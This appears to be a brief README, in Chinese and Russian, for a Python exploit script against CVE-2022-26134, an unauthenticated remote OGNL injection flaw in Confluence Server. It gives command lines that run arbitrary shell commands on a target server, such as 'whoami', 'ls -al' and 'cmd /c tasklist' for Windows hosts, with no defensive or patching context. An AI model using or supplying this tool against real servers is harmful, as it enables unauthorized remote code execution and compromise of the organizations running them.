
(CVE-2022-26134)未经验证的远程 OGNL 注入漏洞,可在 Confluence 服务器上下文中执行代码。
(CVE-2022-26134) Неаутентифицированная и удаленная уязвимость внедрения OGNL, приводящая к выполнению кода в контексте сервера Confluence
Требуется: Python2 или Python3
Использование:
python cve_2022_26134.py -url target_url -cmd "ls -al"
python cve_2022_26134.py -url target_url -cmd "whoami"

Если цель — система Windows, используйте скрипт следующим образом, например:
python3 cve_2022_26134.py -url target_url -cmd "cmd /c tasklist"
